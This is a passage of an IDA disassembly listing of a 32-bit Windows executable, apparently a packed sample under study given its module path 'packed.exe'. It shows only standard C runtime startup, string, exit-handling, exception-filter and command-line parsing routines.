jz short loc_40277F
jmp short loc_40274C
; ---------------------------------------------------------------------------
loc_40277F: ; CODE XREF: sub_402730+12�j
; sub_402730+4B�j
lea edi, [ecx-1]
jmp short loc_402791
; ---------------------------------------------------------------------------
loc_402784: ; CODE XREF: sub_402730+44�j
lea edi, [ecx-2]
jmp short loc_402791
; ---------------------------------------------------------------------------
loc_402789: ; CODE XREF: sub_402730+3D�j
lea edi, [ecx-3]
jmp short loc_402791
; ---------------------------------------------------------------------------
loc_40278E: ; CODE XREF: sub_402730+39�j
lea edi, [ecx-4]
loc_402791: ; CODE XREF: sub_402720+5�j
; sub_402730+52�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_4027B6
loc_40279D: ; CODE XREF: sub_402730+7D�j
mov dl, [ecx]
inc ecx
test dl, dl
jz short loc_402808
mov [edi], dl
inc edi
test ecx, 3
jnz short loc_40279D
jmp short loc_4027B6
; ---------------------------------------------------------------------------
loc_4027B1: ; CODE XREF: sub_402730+9E�j
; sub_402730+B8�j
mov [edi], edx
add edi, 4
loc_4027B6: ; CODE XREF: sub_402730+6B�j
; sub_402730+7F�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_4027B1
test dl, dl
jz short loc_402808
test dh, dh
jz short loc_4027FF
test edx, 0FF0000h
jz short loc_4027F2
test edx, 0FF000000h
jz short loc_4027EA
jmp short loc_4027B1
; ---------------------------------------------------------------------------
loc_4027EA: ; CODE XREF: sub_402730+B6�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4027F2: ; CODE XREF: sub_402730+AE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_4027FF: ; CODE XREF: sub_402730+A6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_402808: ; CODE XREF: sub_402730+72�j
; sub_402730+A2�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_402730 endp
; =============== S U B R O U T I N E =======================================
sub_402810 proc near ; CODE XREF: sub_401E30+19�p
arg_0 = dword ptr 4
cmp ds:dword_406CEC, 1
jle short loc_40282A
push 107h
push [esp+4+arg_0]
call sub_402A4C
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_40282A: ; CODE XREF: sub_402810+7�j
mov eax, [esp+arg_0]
mov ecx, ds:off_406AE0
mov ax, [ecx+eax*2]
and eax, 107h
retn
sub_402810 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40283E proc near ; CODE XREF: start+7�j
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = byte ptr -5Ch
var_30 = dword ptr -30h
var_2C = word ptr -2Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_405128
push offset sub_4034B8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 58h
push ebx
push esi
push edi
mov [ebp+var_18], esp
call ds:dword_4050AC ; GetVersion
xor edx, edx
mov dl, ah
mov ds:dword_406F64, edx
mov ecx, eax
and ecx, 0FFh
mov ds:dword_406F60, ecx
shl ecx, 8
add ecx, edx
mov ds:dword_406F5C, ecx
shr eax, 10h
mov ds:dword_406F58, eax
xor esi, esi
push esi
call sub_403382
pop ecx
test eax, eax
jnz short loc_4028AA
push 1Ch
call sub_402959
pop ecx
loc_4028AA: ; CODE XREF: sub_40283E+62�j
mov [ebp+var_4], esi
call sub_4031D7
call ds:dword_4050A8 ; GetCommandLineA
mov ds:dword_407458, eax
call sub_4030A5
mov ds:dword_406F40, eax
call sub_402E58
call sub_402D9F
call sub_402AC1
mov [ebp+var_30], esi
lea eax, [ebp+var_5C]
push eax
call ds:dword_4050A4 ; GetStartupInfoA
call sub_402D47
mov [ebp+var_64], eax
test byte ptr [ebp+var_30], 1
jz short loc_4028F7
movzx eax, [ebp+var_2C]
jmp short loc_4028FA
; ---------------------------------------------------------------------------
loc_4028F7: ; CODE XREF: sub_40283E+B1�j
push 0Ah
pop eax
loc_4028FA: ; CODE XREF: sub_40283E+B7�j
push eax
push [ebp+var_64]
push esi
push esi
call ds:dword_4050A0 ; GetModuleHandleA
push eax
call sub_402029
mov [ebp+var_60], eax
push eax
call sub_402AEE
mov eax, [ebp+var_14]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp+var_68], ecx
push eax
push ecx
call sub_402BC3
pop ecx
pop ecx
retn
sub_40283E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-68h]
call sub_402AFF
; =============== S U B R O U T I N E =======================================
sub_402934 proc near ; CODE XREF: sub_402D9F+4E�p
; sub_402D9F+7D�p ...
arg_0 = dword ptr 4
cmp ds:dword_406F48, 1
jnz short loc_402942
call sub_403590
loc_402942: ; CODE XREF: sub_402934+7�j
push [esp+arg_0]
call sub_4035C9
push 0FFh
call ds:off_406AD0
pop ecx
pop ecx
retn
sub_402934 endp
; =============== S U B R O U T I N E =======================================
sub_402959 proc near ; CODE XREF: sub_40283E+66�p
arg_0 = dword ptr 4
cmp ds:dword_406F48, 1
jnz short loc_402967
call sub_403590
loc_402967: ; CODE XREF: sub_402959+7�j
push [esp+arg_0]
call sub_4035C9
pop ecx
push 0FFh
call ds:dword_4050B0 ; ExitProcess
retn
sub_402959 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_402996
loc_402980: ; CODE XREF: sub_402996+17�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_402996
; ---------------------------------------------------------------------------
align 10h
xor eax, eax
mov al, [esp+8]
; =============== S U B R O U T I N E =======================================
sub_402996 proc near ; CODE XREF: sub_402600+6E�j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00402980 SIZE 00000005 BYTES
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_4029BB
loc_4029A8: ; CODE XREF: sub_402996+23�j
mov cl, [edx]
inc edx
cmp cl, bl
jz short loc_402980
test cl, cl
jz short loc_402A04
test edx, 3
jnz short loc_4029A8
loc_4029BB: ; CODE XREF: sub_402996+10�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_4029C6: ; CODE XREF: sub_402996+5B�j
; sub_402996+6A�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_402A08
and eax, 81010100h
jz short loc_4029C6
and eax, 1010100h
jnz short loc_402A02
and esi, 80000000h
jnz short loc_4029C6
loc_402A02: ; CODE XREF: sub_402996+62�j
; sub_402996+7B�j ...
pop esi
pop edi
loc_402A04: ; CODE XREF: sub_402996+1B�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_402A08: ; CODE XREF: sub_402996+54�j
mov eax, [edx-4]
cmp al, bl
jz short loc_402A45
test al, al
jz short loc_402A02
cmp ah, bl
jz short loc_402A3E
test ah, ah
jz short loc_402A02
shr eax, 10h
cmp al, bl
jz short loc_402A37
test al, al
jz short loc_402A02
cmp ah, bl
jz short loc_402A30
test ah, ah
jz short loc_402A02
jmp short loc_4029C6
; ---------------------------------------------------------------------------
loc_402A30: ; CODE XREF: sub_402996+92�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_402A37: ; CODE XREF: sub_402996+8A�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_402A3E: ; CODE XREF: sub_402996+7F�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_402A45: ; CODE XREF: sub_402996+77�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_402996 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A4C proc near ; CODE XREF: sub_402810+12�p
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
lea ecx, [eax+1]
cmp ecx, 100h
ja short loc_402A6A
mov ecx, ds:off_406AE0
movzx eax, word ptr [ecx+eax*2]
jmp short loc_402ABC
; ---------------------------------------------------------------------------
loc_402A6A: ; CODE XREF: sub_402A4C+10�j
mov ecx, eax
push esi
mov esi, ds:off_406AE0
sar ecx, 8
movzx edx, cl
test byte ptr [esi+edx*2+1], 80h
pop esi
jz short loc_402A8F
and [ebp+var_2], 0
mov [ebp+var_4], cl
mov [ebp+var_3], al
push 2
jmp short loc_402A98
; ---------------------------------------------------------------------------
loc_402A8F: ; CODE XREF: sub_402A4C+33�j
and [ebp+var_3], 0
mov [ebp+var_4], al
push 1
loc_402A98: ; CODE XREF: sub_402A4C+41�j
pop eax
lea ecx, [ebp+arg_0+2]
push 1
push 0
push 0
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push 1
call sub_40371C
add esp, 1Ch
test eax, eax
jnz short loc_402AB8
leave
retn
; ---------------------------------------------------------------------------
loc_402AB8: ; CODE XREF: sub_402A4C+68�j
movzx eax, word ptr [ebp+arg_0+2]
loc_402ABC: ; CODE XREF: sub_402A4C+1C�j
and eax, [ebp+arg_4]
leave
retn
sub_402A4C endp
; =============== S U B R O U T I N E =======================================
sub_402AC1 proc near ; CODE XREF: sub_40283E+93�p
mov eax, ds:dword_407454
test eax, eax
jz short loc_402ACC
call eax
loc_402ACC: ; CODE XREF: sub_402AC1+7�j
push offset dword_406010
push offset dword_406008
call sub_402BA9
push offset dword_406004
push offset dword_406000
call sub_402BA9
add esp, 10h
retn
sub_402AC1 endp
; =============== S U B R O U T I N E =======================================
sub_402AEE proc near ; CODE XREF: sub_40283E+D2�p
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
call sub_402B10
add esp, 0Ch
retn
sub_402AEE endp
; =============== S U B R O U T I N E =======================================
sub_402AFF proc near ; CODE XREF: .text:0040292F�p
; sub_402934+1C�p
; DATA XREF: ...
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_402B10
add esp, 0Ch
retn
sub_402AFF endp
; =============== S U B R O U T I N E =======================================
sub_402B10 proc near ; CODE XREF: sub_402AEE+8�p
; sub_402AFF+8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
push 1
pop edi
cmp ds:dword_406F94, edi
jnz short loc_402B2D
push [esp+4+arg_0]
call ds:dword_4050B8 ; GetCurrentProcess
push eax
call ds:dword_4050B4 ; TerminateProcess
loc_402B2D: ; CODE XREF: sub_402B10+A�j
cmp [esp+4+arg_4], 0
push ebx
mov ebx, [esp+8+arg_8]
mov ds:dword_406F90, edi
mov ds:byte_406F8C, bl
jnz short loc_402B81
mov eax, ds:dword_407450
test eax, eax
jz short loc_402B70
mov ecx, ds:dword_40744C
push esi
lea esi, [ecx-4]
cmp esi, eax
jb short loc_402B6F
loc_402B5C: ; CODE XREF: sub_402B10+5D�j
mov eax, [esi]
test eax, eax
jz short loc_402B64
call eax
loc_402B64: ; CODE XREF: sub_402B10+50�j
sub esi, 4
cmp esi, ds:dword_407450
jnb short loc_402B5C
loc_402B6F: ; CODE XREF: sub_402B10+4A�j
pop esi
loc_402B70: ; CODE XREF: sub_402B10+3C�j
push offset dword_406018
push offset dword_406014
call sub_402BA9
pop ecx
pop ecx
loc_402B81: ; CODE XREF: sub_402B10+33�j
push offset dword_406020
push offset dword_40601C
call sub_402BA9
pop ecx
pop ecx
test ebx, ebx
pop ebx
jnz short loc_402BA7
push [esp+4+arg_0]
mov ds:dword_406F94, edi
call ds:dword_4050B0 ; ExitProcess
loc_402BA7: ; CODE XREF: sub_402B10+85�j
pop edi
retn
sub_402B10 endp
; =============== S U B R O U T I N E =======================================
sub_402BA9 proc near ; CODE XREF: sub_402AC1+15�p
; sub_402AC1+24�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
loc_402BAE: ; CODE XREF: sub_402BA9+16�j
cmp esi, [esp+4+arg_4]
jnb short loc_402BC1
mov eax, [esi]
test eax, eax
jz short loc_402BBC
call eax
loc_402BBC: ; CODE XREF: sub_402BA9+F�j
add esi, 4
jmp short loc_402BAE
; ---------------------------------------------------------------------------
loc_402BC1: ; CODE XREF: sub_402BA9+9�j
pop esi
retn
sub_402BA9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402BC3 proc near ; CODE XREF: sub_40283E+E3�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push [ebp+arg_0]
call sub_402D04
test eax, eax
pop ecx
jz loc_402CF8
mov ebx, [eax+8]
test ebx, ebx
jz loc_402CF8
cmp ebx, 5
jnz short loc_402BF4
and dword ptr [eax+8], 0
push 1
pop eax
jmp loc_402D01
; ---------------------------------------------------------------------------
loc_402BF4: ; CODE XREF: sub_402BC3+23�j
cmp ebx, 1
jz loc_402CF3
mov ecx, ds:dword_406F98
mov [ebp+arg_0], ecx
mov ecx, [ebp+arg_4]
mov ds:dword_406F98, ecx
mov ecx, [eax+4]
cmp ecx, 8
jnz loc_402CE3
mov ecx, ds:dword_406D70
mov edx, ds:dword_406D74
add edx, ecx
push esi
cmp ecx, edx
jge short loc_402C43
lea esi, [ecx+ecx*2]
sub edx, ecx
lea esi, ds:406D00h[esi*4]
loc_402C3A: ; CODE XREF: sub_402BC3+7E�j
and dword ptr [esi], 0
add esi, 0Ch
dec edx
jnz short loc_402C3A
loc_402C43: ; CODE XREF: sub_402BC3+69�j
mov eax, [eax]
mov esi, ds:dword_406D7C
cmp eax, 0C000008Eh
jnz short loc_402C5E
mov ds:dword_406D7C, 83h
jmp short loc_402CCE
; ---------------------------------------------------------------------------
loc_402C5E: ; CODE XREF: sub_402BC3+8D�j
cmp eax, 0C0000090h
jnz short loc_402C71
mov ds:dword_406D7C, 81h
jmp short loc_402CCE
; ---------------------------------------------------------------------------
loc_402C71: ; CODE XREF: sub_402BC3+A0�j
cmp eax, 0C0000091h
jnz short loc_402C84
mov ds:dword_406D7C, 84h
jmp short loc_402CCE
; ---------------------------------------------------------------------------
loc_402C84: ; CODE XREF: sub_402BC3+B3�j
cmp eax, 0C0000093h
jnz short loc_402C97
mov ds:dword_406D7C, 85h
jmp short loc_402CCE
; ---------------------------------------------------------------------------
loc_402C97: ; CODE XREF: sub_402BC3+C6�j
cmp eax, 0C000008Dh
jnz short loc_402CAA
mov ds:dword_406D7C, 82h
jmp short loc_402CCE
; ---------------------------------------------------------------------------
loc_402CAA: ; CODE XREF: sub_402BC3+D9�j
cmp eax, 0C000008Fh
jnz short loc_402CBD
mov ds:dword_406D7C, 86h
jmp short loc_402CCE
; ---------------------------------------------------------------------------
loc_402CBD: ; CODE XREF: sub_402BC3+EC�j
cmp eax, 0C0000092h
jnz short loc_402CCE
mov ds:dword_406D7C, 8Ah
loc_402CCE: ; CODE XREF: sub_402BC3+99�j
; sub_402BC3+AC�j ...
push ds:dword_406D7C
push 8
call ebx ; _hread
pop ecx
mov ds:dword_406D7C, esi
pop ecx
pop esi
jmp short loc_402CEB
; ---------------------------------------------------------------------------
loc_402CE3: ; CODE XREF: sub_402BC3+52�j
and dword ptr [eax+8], 0
push ecx
call ebx ; _hread
pop ecx
loc_402CEB: ; CODE XREF: sub_402BC3+11E�j
mov eax, [ebp+arg_0]
mov ds:dword_406F98, eax
loc_402CF3: ; CODE XREF: sub_402BC3+34�j
or eax, 0FFFFFFFFh
jmp short loc_402D01
; ---------------------------------------------------------------------------
loc_402CF8: ; CODE XREF: sub_402BC3+F�j
; sub_402BC3+1A�j
push [ebp+arg_4]
call ds:dword_4050BC ; UnhandledExceptionFilter
loc_402D01: ; CODE XREF: sub_402BC3+2C�j
; sub_402BC3+133�j
pop ebx
pop ebp
retn
sub_402BC3 endp
; =============== S U B R O U T I N E =======================================
sub_402D04 proc near ; CODE XREF: sub_402BC3+7�p
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov ecx, ds:dword_406D78
cmp ds:dword_406CF8, edx
push esi
mov eax, offset dword_406CF8
jz short loc_402D31
lea esi, [ecx+ecx*2]
lea esi, ds:406CF8h[esi*4]
loc_402D26: ; CODE XREF: sub_402D04+2B�j
add eax, 0Ch
cmp eax, esi
jnb short loc_402D31
cmp [eax], edx
jnz short loc_402D26
loc_402D31: ; CODE XREF: sub_402D04+16�j
; sub_402D04+27�j
lea ecx, [ecx+ecx*2]
pop esi
lea ecx, ds:406CF8h[ecx*4]
cmp eax, ecx
jnb short loc_402D44
cmp [eax], edx
jz short locret_402D46
loc_402D44: ; CODE XREF: sub_402D04+3A�j
xor eax, eax
locret_402D46: ; CODE XREF: sub_402D04+3E�j
retn
sub_402D04 endp
; =============== S U B R O U T I N E =======================================
sub_402D47 proc near ; CODE XREF: sub_40283E+A5�p
cmp ds:dword_407448, 0
jnz short loc_402D55
call sub_403C6B
loc_402D55: ; CODE XREF: sub_402D47+7�j
push esi
mov esi, ds:dword_407458
mov al, [esi]
cmp al, 22h
jnz short loc_402D87
loc_402D62: ; CODE XREF: sub_402D47+33�j
; sub_402D47+36�j
mov al, [esi+1]
inc esi
cmp al, 22h
jz short loc_402D7F
test al, al
jz short loc_402D7F
movzx eax, al
push eax
call sub_403865
test eax, eax
pop ecx
jz short loc_402D62
inc esi
jmp short loc_402D62
; ---------------------------------------------------------------------------
loc_402D7F: ; CODE XREF: sub_402D47+21�j
; sub_402D47+25�j
cmp byte ptr [esi], 22h
jnz short loc_402D91
loc_402D84: ; CODE XREF: sub_402D47+52�j
inc esi
jmp short loc_402D91
; ---------------------------------------------------------------------------
loc_402D87: ; CODE XREF: sub_402D47+19�j
cmp al, 20h
jbe short loc_402D91
loc_402D8B: ; CODE XREF: sub_402D47+48�j
inc esi
cmp byte ptr [esi], 20h
ja short loc_402D8B
loc_402D91: ; CODE XREF: sub_402D47+3B�j
; sub_402D47+3E�j ...
mov al, [esi]
test al, al
jz short loc_402D9B
cmp al, 20h
jbe short loc_402D84
loc_402D9B: ; CODE XREF: sub_402D47+4E�j
mov eax, esi
pop esi
retn
sub_402D47 endp
; =============== S U B R O U T I N E =======================================
sub_402D9F proc near ; CODE XREF: sub_40283E+8E�p
push ebx
xor ebx, ebx
cmp ds:dword_407448, ebx
push esi
push edi
jnz short loc_402DB1
call sub_403C6B
loc_402DB1: ; CODE XREF: sub_402D9F+B�j
mov esi, ds:dword_406F40
xor edi, edi
loc_402DB9: ; CODE XREF: sub_402D9F+30�j
mov al, [esi]
cmp al, bl
jz short loc_402DD1
cmp al, 3Dh
jz short loc_402DC4
inc edi
loc_402DC4: ; CODE XREF: sub_402D9F+22�j
push esi
call sub_402210
pop ecx
lea esi, [esi+eax+1]
jmp short loc_402DB9
; ---------------------------------------------------------------------------
loc_402DD1: ; CODE XREF: sub_402D9F+1E�j
lea eax, ds:4[edi*4]
push eax
call sub_403CB6
mov esi, eax
pop ecx
cmp esi, ebx
mov ds:dword_406F74, esi
jnz short loc_402DF3
push 9
call sub_402934
pop ecx
loc_402DF3: ; CODE XREF: sub_402D9F+4A�j
mov edi, ds:dword_406F40
cmp [edi], bl
jz short loc_402E36
push ebp
loc_402DFE: ; CODE XREF: sub_402D9F+94�j
push edi
call sub_402210
mov ebp, eax
pop ecx
inc ebp
cmp byte ptr [edi], 3Dh
jz short loc_402E2F
push ebp
call sub_403CB6
cmp eax, ebx
pop ecx
mov [esi], eax
jnz short loc_402E22
push 9
call sub_402934
pop ecx
loc_402E22: ; CODE XREF: sub_402D9F+79�j
push edi
push dword ptr [esi]
call sub_402720
pop ecx
add esi, 4
pop ecx
loc_402E2F: ; CODE XREF: sub_402D9F+6C�j
add edi, ebp
cmp [edi], bl
jnz short loc_402DFE
pop ebp
loc_402E36: ; CODE XREF: sub_402D9F+5C�j
push ds:dword_406F40
call sub_403C87
pop ecx
mov ds:dword_406F40, ebx
mov [esi], ebx
pop edi
pop esi
mov ds:dword_407444, 1
pop ebx
retn
sub_402D9F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402E58 proc near ; CODE XREF: sub_40283E+89�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp ds:dword_407448, ebx
push esi
push edi
jnz short loc_402E6F
call sub_403C6B
loc_402E6F: ; CODE XREF: sub_402E58+10�j
mov esi, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push 104h
push esi
push ebx
call ds:dword_405034 ; GetModuleFileNameA
mov eax, ds:dword_407458
mov ds:off_406F84, esi
mov edi, esi
cmp [eax], bl
jz short loc_402E94
mov edi, eax
loc_402E94: ; CODE XREF: sub_402E58+38�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push ebx
push ebx
push edi
call sub_402EF1
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
lea eax, [eax+ecx*4]
push eax
call sub_403CB6
mov esi, eax
add esp, 18h
cmp esi, ebx
jnz short loc_402EC4
push 8
call sub_402934
pop ecx
loc_402EC4: ; CODE XREF: sub_402E58+62�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_4]
lea eax, [esi+eax*4]
push eax
push esi
push edi
call sub_402EF1
mov eax, [ebp+var_4]
add esp, 14h
dec eax
mov ds:dword_406F6C, esi
pop edi
pop esi
mov ds:dword_406F68, eax
pop ebx
leave
retn
sub_402E58 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402EF1 proc near ; CODE XREF: sub_402E58+47�p
; sub_402E58+7D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_10]
mov eax, [ebp+arg_C]
push ebx
push esi
and dword ptr [ecx], 0
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov dword ptr [eax], 1
mov eax, [ebp+arg_0]
test edi, edi
jz short loc_402F1B
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_402F1B: ; CODE XREF: sub_402EF1+20�j
cmp byte ptr [eax], 22h
jnz short loc_402F64
loc_402F20: ; CODE XREF: sub_402EF1+58�j
; sub_402EF1+5F�j
mov dl, [eax+1]
inc eax
cmp dl, 22h
jz short loc_402F52
test dl, dl
jz short loc_402F52
movzx edx, dl
test ds:byte_407221[edx], 4
jz short loc_402F45
inc dword ptr [ecx]
test esi, esi
jz short loc_402F45
mov dl, [eax]
mov [esi], dl
inc esi
inc eax
loc_402F45: ; CODE XREF: sub_402EF1+46�j
; sub_402EF1+4C�j
inc dword ptr [ecx]
test esi, esi
jz short loc_402F20
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_402F20
; ---------------------------------------------------------------------------
loc_402F52: ; CODE XREF: sub_402EF1+36�j
; sub_402EF1+3A�j
inc dword ptr [ecx]
test esi, esi
jz short loc_402F5C
and byte ptr [esi], 0
inc esi
loc_402F5C: ; CODE XREF: sub_402EF1+65�j
cmp byte ptr [eax], 22h
jnz short loc_402FA7
inc eax
jmp short loc_402FA7
; ---------------------------------------------------------------------------
loc_402F64: ; CODE XREF: sub_402EF1+2D�j
; sub_402EF1+A5�j
inc dword ptr [ecx]
test esi, esi
jz short loc_402F6F
mov dl, [eax]
mov [esi], dl
inc esi
loc_402F6F: ; CODE XREF: sub_402EF1+77�j
mov dl, [eax]
inc eax
movzx ebx, dl
test ds:byte_407221[ebx], 4
jz short loc_402F8A
inc dword ptr [ecx]
test esi, esi
jz short loc_402F89
mov bl, [eax]
mov [esi], bl
inc esi
loc_402F89: ; CODE XREF: sub_402EF1+91�j
inc eax
loc_402F8A: ; CODE XREF: sub_402EF1+8B�j
cmp dl, 20h
jz short loc_402F98
test dl, dl
jz short loc_402F9C
cmp dl, 9
jnz short loc_402F64
loc_402F98: ; CODE XREF: sub_402EF1+9C�j
test dl, dl
jnz short loc_402F9F
loc_402F9C: ; CODE XREF: sub_402EF1+A0�j
dec eax
jmp short loc_402FA7
; ---------------------------------------------------------------------------
loc_402F9F: ; CODE XREF: sub_402EF1+A9�j
test esi, esi
jz short loc_402FA7
and byte ptr [esi-1], 0
loc_402FA7: ; CODE XREF: sub_402EF1+6E�j
; sub_402EF1+71�j ...
and [ebp+arg_10], 0
loc_402FAB: ; CODE XREF: sub_402EF1+19E�j
cmp byte ptr [eax], 0
jz loc_403094
loc_402FB4: ; CODE XREF: sub_402EF1+D0�j
mov dl, [eax]
cmp dl, 20h
jz short loc_402FC0
cmp dl, 9
jnz short loc_402FC3
loc_402FC0: ; CODE XREF: sub_402EF1+C8�j
inc eax
jmp short loc_402FB4
; ---------------------------------------------------------------------------
loc_402FC3: ; CODE XREF: sub_402EF1+CD�j
cmp byte ptr [eax], 0
jz loc_403094
test edi, edi
jz short loc_402FD8
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_402FD8: ; CODE XREF: sub_402EF1+DD�j
mov edx, [ebp+arg_C]
inc dword ptr [edx]
loc_402FDD: ; CODE XREF: sub_402EF1+18F�j
mov [ebp+arg_0], 1
xor ebx, ebx
loc_402FE6: ; CODE XREF: sub_402EF1+FC�j
cmp byte ptr [eax], 5Ch
jnz short loc_402FEF
inc eax
inc ebx
jmp short loc_402FE6
; ---------------------------------------------------------------------------
loc_402FEF: ; CODE XREF: sub_402EF1+F8�j
cmp byte ptr [eax], 22h
jnz short loc_403020
test bl, 1
jnz short loc_40301E
xor edi, edi
cmp [ebp+arg_10], edi
jz short loc_40300D
cmp byte ptr [eax+1], 22h
lea edx, [eax+1]
jnz short loc_40300D
mov eax, edx
jmp short loc_403010
; ---------------------------------------------------------------------------
loc_40300D: ; CODE XREF: sub_402EF1+10D�j
; sub_402EF1+116�j
mov [ebp+arg_0], edi
loc_403010: ; CODE XREF: sub_402EF1+11A�j
mov edi, [ebp+arg_4]
xor edx, edx
cmp [ebp+arg_10], edx
setz dl
mov [ebp+arg_10], edx
loc_40301E: ; CODE XREF: sub_402EF1+106�j
shr ebx, 1
loc_403020: ; CODE XREF: sub_402EF1+101�j
mov edx, ebx
dec ebx
test edx, edx
jz short loc_403035
inc ebx
loc_403028: ; CODE XREF: sub_402EF1+142�j
test esi, esi
jz short loc_403030
mov byte ptr [esi], 5Ch
inc esi
loc_403030: ; CODE XREF: sub_402EF1+139�j
inc dword ptr [ecx]
dec ebx
jnz short loc_403028
loc_403035: ; CODE XREF: sub_402EF1+134�j
mov dl, [eax]
test dl, dl
jz short loc_403085
cmp [ebp+arg_10], 0
jnz short loc_40304B
cmp dl, 20h
jz short loc_403085
cmp dl, 9
jz short loc_403085
loc_40304B: ; CODE XREF: sub_402EF1+14E�j
cmp [ebp+arg_0], 0
jz short loc_40307F
test esi, esi
jz short loc_40306E
movzx ebx, dl
test ds:byte_407221[ebx], 4
jz short loc_403067
mov [esi], dl
inc esi
inc eax
inc dword ptr [ecx]
loc_403067: ; CODE XREF: sub_402EF1+16E�j
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_40307D
; ---------------------------------------------------------------------------
loc_40306E: ; CODE XREF: sub_402EF1+162�j
movzx edx, dl
test ds:byte_407221[edx], 4
jz short loc_40307D
inc eax
inc dword ptr [ecx]
loc_40307D: ; CODE XREF: sub_402EF1+17B�j
; sub_402EF1+187�j
inc dword ptr [ecx]
loc_40307F: ; CODE XREF: sub_402EF1+15E�j
inc eax
jmp loc_402FDD
; ---------------------------------------------------------------------------
loc_403085: ; CODE XREF: sub_402EF1+148�j
; sub_402EF1+153�j ...
test esi, esi
jz short loc_40308D
and byte ptr [esi], 0
inc esi
loc_40308D: ; CODE XREF: sub_402EF1+196�j
inc dword ptr [ecx]
jmp loc_402FAB
; ---------------------------------------------------------------------------
loc_403094: ; CODE XREF: sub_402EF1+BD�j
; sub_402EF1+D5�j
test edi, edi
jz short loc_40309B
and dword ptr [edi], 0
loc_40309B: ; CODE XREF: sub_402EF1+1A5�j
mov eax, [ebp+arg_C]
pop edi
pop esi
pop ebx
inc dword ptr [eax]
pop ebp
retn
sub_402EF1 endp
; =============== S U B R O U T I N E =======================================
sub_4030A5 proc near ; CODE XREF: sub_40283E+7F�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
mov eax, ds:dword_4070A0
push ebx
push ebp
mov ebp, ds:dword_4050D0
push esi
push edi
xor ebx, ebx
xor esi, esi
xor edi, edi
cmp eax, ebx
jnz short loc_4030F3
call ebp ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_4030D4
mov ds:dword_4070A0, 1
jmp short loc_4030FC
; ---------------------------------------------------------------------------
loc_4030D4: ; CODE XREF: sub_4030A5+21�j
call ds:dword_4050CC ; GetEnvironmentStrings
mov edi, eax
cmp edi, ebx
jz loc_4031CE
mov ds:dword_4070A0, 2
jmp loc_403182
; ---------------------------------------------------------------------------
loc_4030F3: ; CODE XREF: sub_4030A5+19�j
cmp eax, 1
jnz loc_40317D
